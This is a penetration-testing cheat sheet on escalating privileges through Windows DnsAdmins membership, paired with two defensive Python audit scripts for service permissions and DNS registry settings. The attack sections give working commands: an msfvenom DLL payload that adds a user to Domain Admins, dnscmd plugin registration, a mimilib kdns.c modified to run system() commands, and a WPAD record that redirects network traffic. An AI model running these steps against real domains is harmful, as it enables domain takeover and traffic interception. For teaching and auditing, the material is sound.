DnsAdmins

DnsAdmins is a Windows user group that grants administrative control over the DNS Server service.
Members can modify DNS settings, create and delete zones, and manage records using tools like dnscmd or PowerShell. It has a known privilege escalation risk, as members can load arbitrary DLLs into the DNS service. Security best practices recommend limiting membership to reduce potential attack vectors.


Abuse DnsAdmins Group

  1. Generate a DLL with msfvenom (this payload adds the user rezydev to Domain Admins):

msfvenom -p windows/x64/exec cmd='net group "Domain Admins" rezydev /add /domain' -f dll -o adduser.dll

  2. Transfer adduser.dll to the Windows target host.
  3. Verify that the current logged-in user is a member of the "DnsAdmins" group.
  4. If the current user is a member of "DnsAdmins", register the DLL as the DNS server plugin:

dnscmd.exe /config /serverlevelplugindll C:\Users\rezydev\Desktop\adduser.dll

  5. Once that is done, check whether the current user can restart the DNS service, or whether we have to wait (possibly hours) for it to restart on its own:

# Find SID of current user
wmic useraccount where name="rezydev" get sid

# Check for permissions
sc.exe sdshow DNS

## Note: If the current user's SID has RP and WP (the start and stop rights) in the
## DACL shown, we have permission to stop and start the DNS service.

  6. Stop the DNS service:

sc stop dns

  7. Start the service:

sc start dns

  8. If everything goes as planned, our user rezydev is now a member of Domain Admins, since that is what we built the msfvenom payload for. The payload could equally be a reverse shell.
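Step 5 above tells you to look for RP and WP next to your SID in the `sc.exe sdshow DNS` output. The following Python script is an added example (not from the original page) that parses that SDDL string and reports which principals hold both the start (RP) and stop (WP) rights on the DNS service, honoring explicit deny ACEs the way the Windows access check does; a defender can run it over a saved `sc.exe sdshow DNS` output to audit who is able to bounce the service. The sample SDDL string, and the S-1-5-21-... SIDs in it, are constructed for illustration.

```python
import re

# Service access rights as sc.exe sdshow prints them (letter pair -> mask).
# Values follow winsvc.h; RP/WP are the start/stop rights the note above refers to.
RIGHT_BITS = {
    "CC": 0x0001,   # SERVICE_QUERY_CONFIG
    "DC": 0x0002,   # SERVICE_CHANGE_CONFIG
    "LC": 0x0004,   # SERVICE_QUERY_STATUS
    "SW": 0x0008,   # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x0010,   # SERVICE_START
    "WP": 0x0020,   # SERVICE_STOP
    "DT": 0x0040,   # SERVICE_PAUSE_CONTINUE
    "LO": 0x0080,   # SERVICE_INTERROGATE
    "CR": 0x0100,   # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x10000,  # DELETE
    "RC": 0x20000,  # READ_CONTROL
    "WD": 0x40000,  # WRITE_DAC
    "WO": 0x80000,  # WRITE_OWNER
    "GA": 0xF01FF,  # GENERIC_ALL maps to SERVICE_ALL_ACCESS
    "GX": 0x20170,  # GENERIC_EXECUTE: start/stop/pause/user-defined + STANDARD_RIGHTS_EXECUTE
}
SERVICE_START, SERVICE_STOP = RIGHT_BITS["RP"], RIGHT_BITS["WP"]

# Well-known SID abbreviations that routinely show up in a service DACL.
WELL_KNOWN_SIDS = {
    "SY": "S-1-5-18", "BA": "S-1-5-32-544", "IU": "S-1-5-4", "SU": "S-1-5-6",
    "AU": "S-1-5-11", "WD": "S-1-1-0", "NS": "S-1-5-20", "LS": "S-1-5-19",
}

ACE_RE = re.compile(r"\(([^)]*)\)")

# Constructed sample of what `sc.exe sdshow DNS` might print. The S-1-5-21-... SIDs
# are made up: ...-1105 stands for a DnsAdmins-style group, ...-1106 for an
# account that has been explicitly denied the stop right.
SAMPLE_SDSHOW = """
D:(D;;WP;;;S-1-5-21-1111-2222-3333-1106)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;S-1-5-21-1111-2222-3333-1105)(A;;CCLCSWRPWPDTLOCRRC;;;S-1-5-21-1111-2222-3333-1106)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
"""


def rights_mask(rights):
    """Turn an ACE rights field (letter pairs or a 0x hex mask) into a bit mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHT_BITS.get(rights[i:i + 2], 0)  # unknown pairs contribute nothing
    return mask


def parse_dacl(sddl):
    """Return [(ace_type, sid, mask)] for every ACE in the DACL part of an SDDL string."""
    dacl = sddl.strip().split("D:", 1)[1]
    dacl = dacl.split("S:", 1)[0]  # drop the SACL (audit ACEs) if present
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")  # type;flags;rights;object_guid;inherit_guid;sid
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        aces.append((ace_type, WELL_KNOWN_SIDS.get(sid, sid), rights_mask(rights)))
    return aces


def effective_mask(sddl, principal_sids):
    """Rights a token holding the given SIDs (user plus groups) has on the service.

    Explicit deny ACEs win over allow ACEs, as in the Windows access check."""
    allowed = denied = 0
    for ace_type, sid, mask in parse_dacl(sddl):
        if sid not in principal_sids:
            continue
        if ace_type == "A":
            allowed |= mask
        elif ace_type == "D":
            denied |= mask
    return allowed & ~denied


def can_restart(sddl, principal_sids):
    """True when the token can both stop (WP) and start (RP) the service."""
    mask = effective_mask(sddl, principal_sids)
    return bool(mask & SERVICE_START) and bool(mask & SERVICE_STOP)


def who_can_restart(sddl):
    """Every SID that, on its own, can stop and start the service (sorted)."""
    sids = {sid for _, sid, _ in parse_dacl(sddl)}
    return sorted(sid for sid in sids if can_restart(sddl, {sid}))


if __name__ == "__main__":
    for sid in who_can_restart(SAMPLE_SDSHOW):
        print("can stop/start the DNS service:", sid)
```

To audit a real host, paste the line printed by `sc.exe sdshow DNS` in place of the sample and pass the user's SID together with the SIDs of the groups in their token (`whoami /groups` lists them) to `can_restart`; a DnsAdmins member whose group does not appear with RP and WP is the case where the attacker has to wait for a restart.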
Cleanup

# Confirm ServerLevelPluginDll registry key exists
reg query \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

# Delete that Key
reg delete \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

# Restart DNS Service
sc.exe start dns

# Verify if it's running
sc query dns

Abuse Using Mimilib.dll

We can also modify kdns.c (from mimilib, the mimikatz DNS plugin) to get RCE:

/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
    return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
    return ERROR_SUCCESS;
}

/* Called by the DNS server for each query once the DLL is registered as the
   server-level plugin. */
DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
    FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
    if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
    {
        /* original mimilib behaviour: log the query name and type */
        klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
        fclose(kdns_logfile);
        /* our modification: the command placed here runs every time the hook fires */
        system("ENTER COMMAND HERE");
    }
    return ERROR_SUCCESS;
}

More info here: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html


Create a WPAD Record

  1. Disable the Global Query Block List:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.rezydev.local

  2. Add a WPAD record pointing at our attack machine:

Add-DnsServerResourceRecordA -Name wpad -ZoneName rezydev.local -ComputerName dc01.rezydev.local -IPv4Address 10.10.10.15

Now every machine running WPAD with default settings will have its traffic proxied through our attack machine.
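Both the Cleanup section (the ServerLevelPluginDll value) and the WPAD section (the Global Query Block List) leave traces under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, which is where the DNS server stores those settings. The following Python script is an added example, not part of the original page, that parses the text `reg query` prints for that key and flags the two conditions a defender wants to catch: a plugin DLL that is not on an allowlist, and a block list that is disabled or no longer covers wpad and isatap. The assumption that an absent EnableGlobalQueryBlockList means "enabled" and an absent GlobalQueryBlockList means the default list is labelled in the code; both `reg query` outputs are constructed samples, not captures from a real host.

```python
import re

# Value names under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters that the
# Cleanup and WPAD sections touch.
PLUGIN_VALUE = "ServerLevelPluginDll"
GQBL_ENABLE_VALUE = "EnableGlobalQueryBlockList"
GQBL_LIST_VALUE = "GlobalQueryBlockList"
DEFAULT_GQBL = ("wpad", "isatap")  # Windows' default block list entries

# One indented `reg query` value line: <name> <REG_type> <data>
VALUE_LINE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")

# Constructed sample: the key after the walkthrough registered adduser.dll
# but before cleanup (not real output from any host).
SAMPLE_AFTER_ABUSE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
    ServerLevelPluginDll    REG_SZ    C:\Users\rezydev\Desktop\adduser.dll
    EnableGlobalQueryBlockList    REG_DWORD    0x1
    GlobalQueryBlockList    REG_MULTI_SZ    wpad\0isatap
"""

# Constructed sample: block list disabled and wpad removed from it.
SAMPLE_WPAD_EXPOSED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
    EnableGlobalQueryBlockList    REG_DWORD    0x0
    GlobalQueryBlockList    REG_MULTI_SZ    isatap
"""


def parse_reg_query(output):
    """Parse the text `reg query <key>` prints into {value_name: python_value}."""
    values = {}
    for line in output.splitlines():
        m = VALUE_LINE_RE.match(line)
        if not m:
            continue  # key header line or blank line
        name, reg_type, data = m.groups()
        if reg_type == "REG_DWORD":
            values[name] = int(data, 16)      # reg query prints DWORDs as 0x...
        elif reg_type == "REG_MULTI_SZ":
            values[name] = data.split("\\0")  # reg query joins entries with \0
        else:
            values[name] = data
    return values


def audit_dns_parameters(values, dll_allowlist=()):
    """Return a list of findings for the parsed DNS\\Parameters values.

    Assumption: a missing EnableGlobalQueryBlockList counts as enabled and a
    missing GlobalQueryBlockList counts as the default (wpad, isatap) list."""
    findings = []
    dll = values.get(PLUGIN_VALUE)
    if dll and dll.lower() not in {p.lower() for p in dll_allowlist}:
        findings.append(f"{PLUGIN_VALUE} is set to an unapproved DLL: {dll}")
    if values.get(GQBL_ENABLE_VALUE, 1) == 0:
        findings.append("Global Query Block List is disabled")
    blocked = {n.lower() for n in values.get(GQBL_LIST_VALUE, DEFAULT_GQBL)}
    for name in DEFAULT_GQBL:
        if name not in blocked:
            findings.append(f"'{name}' is missing from the Global Query Block List")
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_AFTER_ABUSE, SAMPLE_WPAD_EXPOSED):
        for finding in audit_dns_parameters(parse_reg_query(sample)):
            print("FINDING:", finding)
```

On a real DNS server, feed the script the output of `reg query HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters` (locally or via the `\\host\HKLM\...` form used in the Cleanup section) and pass the DLL paths you actually expect, if any, as `dll_allowlist`; on most servers the ServerLevelPluginDll value should simply not exist.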